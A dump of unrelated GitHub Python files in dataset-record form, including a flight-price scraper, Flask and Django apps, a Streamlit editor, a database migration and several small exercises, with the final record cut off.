\"linkTrackerId\": link_tracker_id,\r\n \"newCabinDeal\": 2,\r\n \"openid\": \"\",\r\n \"plat\": int(gnjpapphead['tcplat']),\r\n \"refid\": \"0\",\r\n \"unionid\": \"\"\r\n }\r\n headers = self.get_headers_2(gnjpapphead, ua, link_tracker_id, session_id, cookies)\r\n headers['Referer'] = f'https://m.ly.com/touchbook/touch/sbook1_5?fromcitycode={from_city_code}&tocitycode={to_city_code}&childticket=0,0&fromairport={__from_city_code}&toairport=&cabin=0&hasAirPort=3&RefId=0&bd_vid='\r\n req_url = \"https://m.ly.com/touchbook/flightApis/wx/flightbffquery/query/getkylinflightlist\"\r\n try:\r\n with httpx.Client(headers=headers) as client:\r\n res = client.post(url=req_url, json=form_data, timeout=30, follow_redirects=False)\r\n if res.status_code in [200, 201]:\r\n self.success_lowest += 1\r\n self.ylLog.info(f\"成功返回JSON数据>>>{self.success_lowest}\")\r\n data = json.loads(res.content.decode())\r\n # 只取最低价格,所以只从经济舱里面取\r\n economy_list = data['body']['newCabinList']['economyList']\r\n sell_price, discount, price = [], [], []\r\n price_dict = defaultdict()\r\n for i, economy_cabin in enumerate(economy_list):\r\n # 首先判断是不是产品,不是产品才进行比较出最低价\r\n if str(economy_cabin['ruleId']).__eq__(\"00000\"):\r\n # 将最低价取出进行比较\r\n sell_price.append(int(economy_cabin['clientTicketPrice']))\r\n price_dict[int(economy_cabin['clientTicketPrice'])] = i\r\n # 没有ruleId为00000的价格,筛选出限时特惠,成人特惠,婴儿不可预订的价格\r\n elif len(economy_cabin['limitLabel']) == 0 or (\r\n economy_cabin['limitLabel'][0]['name'] == \"限时特惠\" or\r\n economy_cabin['limitLabel'][0]['name'] == \"婴儿不可预订\"\r\n ):\r\n sell_price.append(int(economy_cabin['clientTicketPrice']))\r\n price_dict[int(economy_cabin['clientTicketPrice'])] = i\r\n else:\r\n continue\r\n # 非空判断\r\n if len(sell_price) == 0:\r\n raise ValueError(\"No price!\")\r\n else:\r\n # 升序排序, 排在第一个的为最低价\r\n sell_price.sort(reverse=False)\r\n index = price_dict[sell_price[0]]\r\n price.append(str(sell_price[0]))\r\n discount.append(economy_list[index]['roomDes'])\r\n # 退改价格\r\n try:\r\n lep_price = economy_list[index]['lep']\r\n # lep为空字符串, 取lrp\r\n if lep_price == \"\":\r\n lep_price = economy_list[index]['lrp']\r\n except:\r\n print(\"err_from_city_code\", from_city_code, \"err_to_city_code\", to_city_code, \"err_off_date\", off_date, \"err_plane_no\", plane_no, \"err_economy_cabin\", economy_list[index])\r\n print(traceback.format_exc())\r\n lep_price = int(lep_price) if lep_price is not None and lep_price != \"\" else None\r\n # lep_price = \"提前改期免费\" if lep_price == 0 else f\"退改¥{str(lep_price)}起\"\r\n # 餐食情况\r\n is_meal = str(economy_list[index]['ml'])\r\n # 托运行李额\r\n baggage = int(economy_list[index]['baggage'])\r\n # baggage = \"无免费托运行李额\" if baggage == 0 else f\"托运行李额{str(baggage)}kg\"\r\n print(\"from_city_code\", from_city_code, \"from_city\", from_city, \"to_city_code\",\r\n to_city_code,\r\n \"to_city\", to_city, \"off_date\", off_date,\r\n \"plane_no\", plane_no, \"price\", price, \"discount\", discount, \"lep_price\", lep_price,\r\n \"is_meal\", is_meal, \"baggage\", baggage, \"from_city_airport\", from_city_airport, \"to_city_airport\", to_city_airport, \"create_time\", create_time)\r\n return [company, company_no, plane_no, start_time, end_time, from_city, from_city_code, to_city, to_city_code, create_time, str(discount[0]), off_date, platform, str(price), flight_type, plane_type, flight_transfer, from_city_airport, to_city_airport, self.task_time, ip_map[int(self.redisUtil.db)], count, lep_price, is_meal, baggage]\r\n else:\r\n self.fail += 1\r\n msg = f\"状态码异常>>>{self.fail}, 状态码: {res.status_code}\\n\"\r\n self.ylLog.exception(msg)\r\n path = fr\"/errorHtml/{from_city}-{to_city}-{off_date}-status_error.html\"\r\n self.ylFile.createFile(path, res.content.decode())\r\n except:\r\n traceback.print_exc()\r\n path = \"/result/error_ua.txt\"\r\n self.ylFile.createFile(path, '\\n')\r\n # -------------------d\r\n xmlpath = fr\"/result/{from_city}({from_city_code})-{to_city}({to_city_code})-{off_date}-exception.html\"\r\n self.ylFile.createFile(xmlpath, res.content.decode(), model='w+')\r\n self.ylLog.info(f\"{xmlpath}写入源码文件成功\")\r\n return []\r\n\r\n","repo_name":"Cjingger/__spider","sub_path":"spiders/ylSpider06.py","file_name":"ylSpider06.py","file_ext":"py","file_size_in_byte":31566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12158513559","text":"from __future__ import annotations\n\nimport random\nimport string\nfrom decimal import Decimal\n\nfrom src import model\nfrom src.adapters import repository\n\n\ndef random_lower_string() -> str:\n return \"\".join(random.choices(string.ascii_lowercase, k=32))\n\n\ndef add_workout_plan_to_db(\n plans_repository: repository.WorkoutRepository[model.WorkoutPlan],\n user_email: str,\n) -> model.WorkoutPlan:\n \"\"\"Add a random workout plan to the database.\"\"\"\n workout_plan_create = model.WorkoutPlanCreate(\n name=random_lower_string(),\n exercises=[\n model.ExercisePlan(name=random_lower_string(), sets=random.randint(1, 10))\n for _ in range(random.randint(1, 10))\n ],\n )\n return plans_repository.create(model=workout_plan_create, owner=user_email)\n\n\ndef add_workout_log_to_db(\n logs_repository: repository.WorkoutRepository[model.WorkoutLog],\n user_email: str,\n) -> model.WorkoutLog:\n \"\"\"Add a random workout log to the database.\"\"\"\n workout_log_create = model.WorkoutLogCreate(\n name=random_lower_string(),\n plans=[\n model.ExercisePlan(\n name=random_lower_string(),\n sets=random.randint(1, 10),\n )\n for _ in range(random.randint(1, 10))\n ],\n logs=[\n model.ExerciseLog(\n name=random_lower_string(),\n sets=[\n model.SetLog(\n weight=Decimal(random.randint(1, 100)),\n reps=random.randint(1, 100),\n )\n for _ in range(random.randint(1, 10))\n ],\n )\n for _ in range(random.randint(1, 10))\n ],\n )\n return logs_repository.create(model=workout_log_create, owner=user_email)\n","repo_name":"moyes-joe/workout-tracker-backend","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2768955468","text":"from __future__ import unicode_literals\nfrom flask import Flask,render_template,redirect,request\n\n# 创建应用程序对象\napp = Flask(__name__)\n\nclass Blog:\n def __init__(self, id, title, text):\n self.id = id\n self.title = title\n self.text = text\n\n\nblogs = []\nb1 = Blog(1,'hello1','zhangsan')\nb2 = Blog(2,'hello2','lisi')\nblogs.append(b1)\nblogs.append(b2)\n\n\n@app.route('/')\ndef index():\n # 渲染首页HTML模板文件\n return render_template('index.html')\n\n@app.route('/blogs')\ndef list_notes():\n\n\n # 渲染博文列表页面目标文件,传入blogs参数\n return render_template('list_blogs.html',blogs = blogs)\n\n@app.route('/blog/')\ndef query_note(id):\n\n blog = None\n # 到数据库查询博文详情\n for blg in blogs:\n if blg.id == int(id):\n blog = blg\n\n # 渲染博文详情页面\n return render_template('query_blog.html',blog = blog)\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1',port=9999)","repo_name":"luckyxx/micro_server","sub_path":"blog/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42302080518","text":"\"\"\"added mechanic id in repair model\n\nRevision ID: 14a1b97b8f0f\nRevises: 8ed3cc33c444\nCreate Date: 2022-08-21 22:24:13.316194\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '14a1b97b8f0f'\ndown_revision = '8ed3cc33c444'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('repair', sa.Column('mechanic_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'repair', 'mechanic', ['mechanic_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'repair', type_='foreignkey')\n op.drop_column('repair', 'mechanic_id')\n # ### end Alembic commands ###\n","repo_name":"PeterM358/VehicleRepairBook","sub_path":"migrations/versions/14a1b97b8f0f_added_mechanic_id_in_repair_model.py","file_name":"14a1b97b8f0f_added_mechanic_id_in_repair_model.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70507826729","text":"import os\nfrom json import JSONEncoder\n\n# pip install httpagentparser\nimport httpagentparser # for getting the user agent as json\nfrom user_agents import parse\nimport nltk\nfrom flask import Flask, render_template, session\nfrom flask import request\nimport datetime\nimport time\nimport random\n\nfrom myapp.analytics.analytics_data import AnalyticsData, ClickedDoc\nfrom myapp.search.load_corpus import load_corpus, to_df\nfrom myapp.search.objects import Document, StatsDocument, StatsQuery, StatsSession, ResultItem\nfrom myapp.search.search_engine import SearchEngine\n\n# *** for using method to_json in objects ***\ndef _default(self, obj):\n return getattr(obj.__class__, \"to_json\", _default.default)(obj)\n\n_default.default = JSONEncoder().default\nJSONEncoder.default = _default\n\n# end lines ***for using method to_json in objects ***\n\n# instantiate the Flask application\napp = Flask(__name__)\n\n# random 'secret_key' is used for persisting data in secure cookie\napp.secret_key = 'afgsreg86sr897b6st8b76va8er76fcs6g8d7'\n# open browser dev tool to see the cookies\napp.session_cookie_name = 'IRWA_SEARCH_ENGINE'\n\n# instantiate our search engine\nsearch_engine = SearchEngine()\n\n# instantiate our in memory persistence\nanalytics_data = AnalyticsData()\n\nfull_path = os.path.realpath(__file__)\npath, filename = os.path.split(full_path)\n\n# load documents corpus into memory.\nfile_path = path + \"/Rus_Ukr_war_data.json\"\ncorpus = load_corpus(file_path)\nprint(\"loaded corpus. first elem:\", list(corpus.values())[0], \"\\n\")\n\nsession_id = 'Session' + str(random.randint(0, 100000))\n\n# creating the df\ndf = to_df(corpus)\ncolumn_values = df[\"Tweet_Text\"].tolist()\nt_lines = []\ni = 0\n\nresult_items = []\nfor index, row in df.iterrows():\n article_id = i\n tweet_id = row['Tweet_Id']\n tweet_text = row['Tweet_Text']\n tweet_text =\"\".join(tweet_text)\n \n result_item = ResultItem(id=row['Tweet_Id'], description=row['Tweet_Text'], date=row['Date'], \n url=row['Url'], title = row[\"Title\"])\n result_items.append(result_item)\n\n line = f\"{tweet_id}|{article_id}|{tweet_text}\"\n t_lines.append(line)\n i = i+1\n\n\n# Home URL \"/\"\n@app.route('/')\ndef index():\n session['end'] = time.time()\n \n print(\"starting home url /...\")\n\n # flask server creates a session by persisting a cookie in the user's browser.\n # the 'session' object keeps data between multiple requests\n session['some_var'] = \"IRWA 2023 home\"\n\n user_agent = request.headers.get('User-Agent')\n print(\"Raw user browser:\", user_agent)\n\n user_ip = request.remote_addr\n agent = httpagentparser.detect(user_agent)\n user_os = agent['os']['name']\n user_browser = agent['browser']['name']\n date_time = datetime.datetime.now()\n date = str(date_time.day) + '-' + str(date_time.month) + '-' + str(date_time.year)\n hour = str(date_time.hour)\n \n print(\"Remote IP: {} - JSON user browser {}\".format(user_ip, agent))\n print(session)\n\n # store data in statistics tables\n if user_browser in analytics_data.fact_browser.keys():\n analytics_data.fact_browser[user_browser] += 1\n else:\n analytics_data.fact_browser[user_browser] = 1\n \n if user_ip in analytics_data.fact_ip.keys():\n analytics_data.fact_ip[user_ip] += 1\n else:\n analytics_data.fact_ip[user_ip] = 1\n \n if user_os in analytics_data.fact_OS.keys():\n analytics_data.fact_OS[user_os] += 1\n else:\n analytics_data.fact_OS[user_os] = 1\n \n if date in analytics_data.fact_date.keys():\n analytics_data.fact_date[date] += 1\n else:\n analytics_data.fact_date[date] = 1\n \n if hour in analytics_data.fact_time.keys():\n analytics_data.fact_time[hour] += 1\n else:\n analytics_data.fact_time[hour] = 1\n \n try:\n dwell_time = session['end'] - session['start']\n if session['last_doc_id'] in analytics_data.fact_dwell_time.keys():\n analytics_data.fact_dwell_time[session['last_doc_id']] += dwell_time\n else:\n analytics_data.fact_dwell_time[session['last_doc_id']] = dwell_time\n except:\n pass\n\n return render_template('index.html', page_title=\"Welcome\")\n\n@app.route('/search', methods=['POST'])\ndef search_form_post():\n search_query = request.form['search-query']\n terms = search_query.split()\n\n # store data in statistics tables\n # table 1\n for term in terms:\n if term in analytics_data.fact_terms.keys():\n analytics_data.fact_terms[term] += 1\n else:\n analytics_data.fact_terms[term] = 1\n\n if search_query not in analytics_data.fact_number_terms.keys():\n analytics_data.fact_number_terms[search_query] = len(terms)\n \n if search_query in analytics_data.fact_query_times.keys():\n analytics_data.fact_query_times[search_query] += 1\n else:\n analytics_data.fact_query_times[search_query] = 1\n \n # stats for sessions\n if session_id in analytics_data.fact_num_queries.keys():\n analytics_data.fact_num_queries[session_id] += 1\n else:\n analytics_data.fact_num_queries[session_id] = 1\n \n session['last_search_query'] = search_query\n\n search_id = analytics_data.save_query_terms(search_query)\n\n ranked_docs, result_scores = search_engine.search(search_query, t_lines)\n\n found_count = len(ranked_docs)\n session['last_found_count'] = found_count\n\n print(session)\n\n docs = []\n\n for doc_id in ranked_docs:\n doc_id = int(doc_id)\n if doc_id in df['Tweet_Id'].values:\n row = df[df['Tweet_Id'] == doc_id].iloc[0]\n docs.append(ResultItem(row['Tweet_Id'], row[\"Title\"], row['Tweet_Text'], row['Date'], \"doc_details?id={}&search_id={}&search_query={}\".format(row['Tweet_Id'], search_id, search_query)))\n else:\n print(f\"Document with ID {doc_id} not found in the 'Tweet_Id' column.\")\n \n return render_template('results.html', results_list=docs, page_title=\"Results\", found_counter=found_count)\n\n\n@app.route('/doc_details', methods=['GET'])\ndef doc_details():\n session['start'] = time.time()\n # getting request parameters:\n #user = request.args.get('user')\n \n print(\"doc details session: \")\n print(session)\n\n res = session[\"some_var\"]\n\n print(\"recovered var from session:\", res)\n\n # get the query string parameters from request\n clicked_doc_id = int(request.args[\"id\"])\n session['last_doc_id'] = clicked_doc_id\n p1 = int(request.args[\"search_id\"]) # transform to Integer\n query = request.args[\"search_query\"]\n print(\"click in id={}\".format(clicked_doc_id))\n\n # store data in statistics tables\n # table 2\n if clicked_doc_id in analytics_data.fact_clicks.keys():\n analytics_data.fact_clicks[clicked_doc_id] += 1\n if query not in analytics_data.fact_queries[clicked_doc_id]:\n analytics_data.fact_queries[clicked_doc_id].append(query)\n else:\n analytics_data.fact_clicks[clicked_doc_id] = 1\n analytics_data.fact_queries[clicked_doc_id] = [query]\n \n if len(analytics_data.fact_rankings) < 10:\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n else:\n if analytics_data.fact_rankings[clicked_doc_id] > min(analytics_data.fact_rankings.values()):\n minimum = min(analytics_data.fact_rankings.values())\n docs = [docs for doc in analytics_data.fact_rankings.keys() if analytics_data.fact_rankings[doc]==minimum]\n analytics_data.fact_rankings.pop(docs[0])\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n else:\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n\n if session_id in analytics_data.fact_num_detail.keys():\n analytics_data.fact_num_detail[session_id] += 1\n else:\n analytics_data.fact_num_detail[session_id] = 1\n \n print(\"fact_clicks count for id={} is {}\".format(clicked_doc_id, analytics_data.fact_clicks[clicked_doc_id]))\n return render_template('doc_details.html', item=corpus[clicked_doc_id])\n\n\n@app.route('/stats', methods=['GET'])\ndef stats():\n\n docs = []\n queries = []\n\n for doc_id in analytics_data.fact_clicks:\n row: Document = corpus[int(doc_id)]\n count = analytics_data.fact_clicks[doc_id]\n\n if doc_id in analytics_data.fact_rankings.keys():\n is_top10=True\n else: \n is_top10=False\n\n queries_related = analytics_data.fact_queries[doc_id]\n\n try: \n dwell_time = round(analytics_data.fact_dwell_time[doc_id], 2) \n except: \n dwell_time=1\n\n doc = StatsDocument(row.id, row.title, row.description, row.doc_date, row.url, count, is_top10, queries_related, dwell_time)\n docs.append(doc)\n \n for query in analytics_data.fact_query_times:\n length = analytics_data.fact_number_terms[query]\n times_searched = analytics_data.fact_query_times[query]\n query = StatsQuery(query, length, times_searched)\n queries.append(query)\n\n print(analytics_data.fact_browser, analytics_data.fact_OS) \n session_data = StatsSession(analytics_data.fact_browser, analytics_data.fact_OS, analytics_data.fact_ip, analytics_data.fact_time, analytics_data.fact_date, analytics_data.fact_num_queries, analytics_data.fact_num_detail)\n \n # simulate sort by ranking\n docs.sort(key=lambda doc: doc.count, reverse=True)\n return render_template('stats.html', clicks_data=docs, searched_queries=queries, session_data=session_data)\n \n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n visited_docs = []\n print(analytics_data.fact_clicks.keys())\n\n for doc_id in analytics_data.fact_clicks.keys():\n d: Document = corpus[int(doc_id)]\n doc = ClickedDoc(doc_id, d.description, analytics_data.fact_clicks[doc_id])\n visited_docs.append(doc)\n\n # simulate sort by ranking\n visited_docs.sort(key=lambda doc: doc.counter, reverse=True)\n visited_ser = []\n\n for doc in visited_docs: \n visited_ser.append(doc.to_json())\n\n return render_template('dashboard.html', visited_docs=visited_ser)\n\n\n@app.route('/sentiment')\ndef sentiment_form():\n return render_template('sentiment.html')\n\n\n@app.route('/sentiment', methods=['POST'])\ndef sentiment_form_post():\n text = request.form['text']\n nltk.download('vader_lexicon')\n from nltk.sentiment.vader import SentimentIntensityAnalyzer\n sid = SentimentIntensityAnalyzer()\n score = ((sid.polarity_scores(str(text)))['compound'])\n return render_template('sentiment.html', score=score)\n\n\nif __name__ == \"__main__\":\n app.run(port=8088, host=\"0.0.0.0\", threaded=False, debug=True)\n","repo_name":"edithruizz/IRWA-Project","sub_path":"Part 4/web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74076593129","text":"# get code from script_default_agent.py\nfrom streamlit_ace import st_ace\nimport streamlit as st\nimport tempfile\n\nst.set_page_config(layout=\"wide\")\nfrom datab import Database_Scripts\n# get all the scripts from the database\n\ndb = Database_Scripts()\nscripts = db.select()\nscripts = [script[0] for script in scripts]\nif len(scripts) == 0:\n #\n st.info('No projects found. Create a new project.')\n st.stop()\n \nproject_name = st.sidebar.selectbox('Select a project', scripts)\n\ndef get_code(path='scripts/script_default_agent.py'):\n python_script_path = path\n # read as string\n with open(python_script_path, 'r') as f:\n value = f.read()\n st.write(value)\n return str(value)\n\ndef get_code_from_db(project_name):\n try:\n # now get the code from the database\n db = Database_Scripts()\n scripts = db.get_from_project(project_name)\n scripts = scripts[0]\n return scripts\n except:\n st.stop()\n \nc1,c2,c3 = st.columns(3) \nradio = c1.radio('Select a script', ['Agent', 'Model', 'Utils'], horizontal=True)\n\n# Create a new project\nmy_form3 = st.sidebar.form(key='form3', clear_on_submit=True)\nx1,x2 = my_form3.columns(2)\nsubmit_button = x2.form_submit_button(label='Create new Project', use_container_width=True)\nproject_name_new = x1.text_input(label='Project Name', value='', autocomplete='on', key=None, help=None)\nunique_project_name = True if project_name_new not in scripts else False\nif submit_button and unique_project_name:\n default_agent = get_code('scripts/script_default_agent.py')\n default_model = get_code('scripts/script_default_model.py')\n default_utils = get_code('scripts/script_default_utils.py')\n\n db.insert(project_name_new, default_model, default_agent, default_utils)\n st.experimental_rerun()\n\n#\nsave = st.sidebar.button('Save', use_container_width=True)\nrestore_base = c3.button('Restore Default', use_container_width=True)\nagent_code = db.get_agent_from_project(project_name)[0][0]\nmodel_code = db.get_model_from_project(project_name)[0][0]\nutils_code = db.get_utils_from_project(project_name)[0][0]\n\nif radio == 'Agent':\n value = agent_code\nelif radio == 'Model':\n value = model_code\nelif radio == 'Utils':\n value = utils_code\n\ncode_area = st_ace(value=value, language='python', theme='monokai', keybinding='vscode', font_size=14, tab_size=4, show_gutter=True, show_print_margin=True, wrap=True, auto_update=True, readonly=False, key=None)\n\nif save and radio == 'Agent':\n db.update_agent_from_project(project_name=project_name, Agent=code_area)\n agent_code = db.get_agent_from_project(project_name)[0][0]\n \nelif save and radio == 'Model':\n db.update_model_from_project(project_name=project_name, Model=code_area)\n model_code = db.get_model_from_project(project_name)[0][0]\n # update the model from project\n\nelif save and radio == 'Utils':\n db.update_utils_from_project(project_name=project_name, Utils=code_area)\n utils_code = db.get_utils_from_project(project_name)[0][0]\n\nif restore_base:\n db.update_from_project(project_name=project_name, Model=get_code('scripts/script_default_model.py'), Agent=get_code('scripts/script_default_agent.py'), Utils=get_code('scripts/script_default_utils.py'))\n st.balloons()\n st.experimental_rerun()\n\ndelete_button = st.sidebar.button('Delete Project', use_container_width=True)\nif delete_button:\n db.delete_from_project(project_name=project_name)\n st.experimental_rerun()\n\nif st.button('Write'):\n with open('scripts/agent.py', 'w') as f:\n f.write(agent_code)\n with open('scripts/model.py', 'w') as f:\n f.write(model_code)\n with open('scripts/utils.py', 'w') as f:\n f.write(utils_code)","repo_name":"robsca/stock_s","sub_path":"pages/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35840705860","text":"__doc__ = \"\"\"\nKeeps track of inventory.\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom alexandria.dewey import HEADERS, INDICES\n\n\nclass MobiusChair(object):\n _chair_stats_ = {}\n\n def __init__(self, *args, **kwargs):\n self.df = None # so del works\n self.inv_path = os.path.join(\n os.path.dirname(__file__),\n 'storage',\n 'inventory.csv'\n )\n in_use = self._chair_stats_.get('inUse', False)\n if in_use:\n raise Exception('Only one MobiusChair can exist at a time!')\n self._chair_stats_['inUse'] = True\n if os.path.exists(self.inv_path):\n self.df = pd.read_csv(self.inv_path)\n else:\n self.df = pd.DataFrame(columns=HEADERS)\n self.df.set_index(INDICES, inplace=True)\n\n def __del__(self):\n if self.df is None:\n return\n self.df.to_csv(self.inv_path)\n\n def _add_df(self, df, subtract=False):\n d = df.reset_index().to_dict()\n for v in d.values():\n self._add_dict(self, d, subtract)\n\n def _add_dict(self, data, subtract=False):\n try:\n key = [data[k] for k in INDICES]\n copies = -data['Copies'] if subtract else data['Copies']\n self.df.loc[key]['Copies'] += copies\n except:\n self.df.append(data)\n","repo_name":"Terrorbear/comican","sub_path":"mobius.py","file_name":"mobius.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32701497482","text":"import os\nfrom datetime import datetime as dt\nimport time\nimport json\n\nfrom json2args import get_parameter\nimport numpy as np\n\nfrom tool_lib import init_cluster, parse_data, get_results\n\n# parse parameters\nkwargs = get_parameter()\n\n# check if a toolname was set in env\ntoolname = os.environ.get('TOOL_RUN', 'cluster').lower()\n\n# switch the tool\nif toolname == 'cluster':\n # get the parameter\n try:\n data = parse_data(kwargs['data'])\n except Exception as e:\n print(str(e))\n raise e\n \n # initialize the cluster instance\n try:\n cl = init_cluster(\n method=kwargs['method'],\n n_clusters=kwargs.get('n_clusters'),\n random_state=kwargs.get('random_state', 42),\n **kwargs.get('init_args', {})\n )\n except KeyError as e:\n print(\"Mandatory data is missing, please check the Tool specification.\")\n raise e\n\n # run the Algorithm\n t1 = time.time()\n cl.fit(data)\n t2 = time.time()\n print(f\"Clustering took {t2 - t1} seconds\")\n\n # get results\n labels, centers = get_results(cl, data)\n\n # save the results\n np.savetxt('/out/labels.dat', labels, fmt=\"%d\")\n np.savetxt('/out/cluster_centers.dat', centers)\n with open('/out/clustering.json', 'w') as f:\n json.dump(dict(labels=labels, centers=centers), indent=4)\n\n\n# In any other case, it was not clear which tool to run\nelse:\n raise AttributeError(f\"[{dt.now().isocalendar()}] Either no TOOL_RUN environment variable available, or '{toolname}' is not valid.\\n\")\n","repo_name":"VForWaTer/tool_clustering","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20071167322","text":"# Databricks notebook source\nfrom pyspark.sql import *\nfrom pyspark import SparkContext\n# from pyspark.context import SparkContext\n# from pyspark.sql.session import SparkSession\n# sc = SparkContext.getOrCreate()\n# spark = SparkSession(sc)\n\n# Create Example Data - Departments and Employees\n\n# Create the Departments\ndepartment1 = Row(id='123456', name='Computer Science')\ndepartment2 = Row(id='789012', name='Mechanical Engineering')\ndepartment3 = Row(id='345678', name='Theater and Drama')\ndepartment4 = Row(id='901234', name='Indoor Recreation')\n\n# Create the Employees\nEmployee = Row(\"firstName\", \"lastName\", \"email\", \"salary\")\nemployee1 = Employee('michael', 'armbrust', 'no-reply@berkeley.edu', 100000)\nemployee2 = Employee('xiangrui', 'meng', 'no-reply@stanford.edu', 120000)\nemployee3 = Employee('matei', None, 'no-reply@waterloo.edu', 140000)\nemployee4 = Employee(None, 'wendell', 'no-reply@berkeley.edu', 160000)\n\n# Create the DepartmentWithEmployees instances from Departments and Employees\ndepartmentWithEmployees1 = Row(department=department1, employees=[employee1, employee2])\ndepartmentWithEmployees2 = Row(department=department2, employees=[employee3, employee4])\ndepartmentWithEmployees3 = Row(department=department3, employees=[employee1, employee4])\ndepartmentWithEmployees4 = Row(department=department4, employees=[employee2, employee3])\n\nprint (department1)\nprint (employee2)\nprint (departmentWithEmployees1.employees[0].email)\n\n# COMMAND ----------\n\nfrom pyspark.sql import *\n\n# Create Example Data - Departments and Employees\n\n\n\ndepartmentsWithEmployeesSeq1 = [departmentWithEmployees1, departmentWithEmployees2]\ndf1 = spark.createDataFrame(departmentsWithEmployeesSeq1)\n\ndisplay(df1)\n\ndepartmentsWithEmployeesSeq2 = [departmentWithEmployees3, departmentWithEmployees4]\ndf2 = spark.createDataFrame(departmentsWithEmployeesSeq2)\n\ndisplay(df2)\n\n\n","repo_name":"ranga11/GoogleCloudPlatform","sub_path":"sparkdftest.py","file_name":"sparkdftest.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29370457032","text":"# WAP to print the numbers from userdefined n to 0 using recursion\n\ninp = int(input(\"Enter n: \"))\n\n# def rec(n):\n# j = n\n# arr = []\n# for i in range(0, j+1):\n# arr.append(i)\n# arr.reverse()\n# for i in arr:\n# print(i)\n\ndef rec(n):\n print(n)\n n-=1\n if(n==-1):\n return\n rec(n)\n\nrec(inp)","repo_name":"JohnJoseph2007/python","sub_path":"Python/Problem Statements/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37446296914","text":"from django.urls import path\n\nfrom .views import ViewPageView, HomePageView, DashboardPageView\n\n\nurlpatterns = [\n path(\"view/\", ViewPageView.as_view(), name=\"view\"),\n path(\"\", HomePageView.as_view(), name=\"home\"),\n path(\"dashboard/\", DashboardPageView.as_view(), name=\"dashboard\"),\n]","repo_name":"DevGameDev/forecasTS","sub_path":"data_sort/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5458665052","text":"from anytree import Node, RenderTree, findall, Walker\n\n\nclass DefaultNodeDict(dict):\n def __missing__(self, key):\n res = self[key] = Node(key)\n return res\n\n\nif __name__ == \"__main__\":\n\n # with open(\"example_1\") as f:\n with open(\"input_1\") as f:\n input_m = [line.rstrip() for line in f]\n\n # print(f\"input {input_m}\")\n\n nodes = DefaultNodeDict()\n\n for input_orbit in input_m:\n center, satellite = input_orbit.split(\")\")\n nodes[satellite].parent = nodes[center]\n\n print(RenderTree(nodes[\"COM\"]))\n w = Walker()\n # upward, common, downward = w.walk(nodes[\"YOU\"], nodes[\"SAN\"])\n # print(len(upward) + len(downward) - 2)\n\n # Part 1 below ###\n total = 0\n for node in nodes.values():\n upward, common, downward = w.walk(node, nodes[\"COM\"])\n total += len(upward) + len(downward)\n print(total - len(nodes))\n","repo_name":"jgaye/advent_of_code_2019","sub_path":"day_6/day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42577057657","text":"# QUESTION URL = https://www.hackerrank.com/challenges/max-array-sum/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=dynamic-programming\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\ndef maxSubsetSum(arr):\r\n dp = []\r\n dp.append(arr[0])\r\n dp.append(max(arr[:2]))\r\n ans = max(dp)\r\n for a in arr[2:]:\r\n dp.append(max(max(dp[-2]+a, a), ans))\r\n ans = max(ans, dp[-1])\r\n return ans\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n res = maxSubsetSum(arr)\r\n\r\n fptr.write(str(res) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"TARMAH/HACKER-RANK","sub_path":"Interview Preparation Kit/Dynamic Programming/Max Array Sum.py","file_name":"Max Array Sum.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19162302399","text":"__author__ = 'harishrohini'\nfrom Instructions import Instructions\nfrom src.Registers import 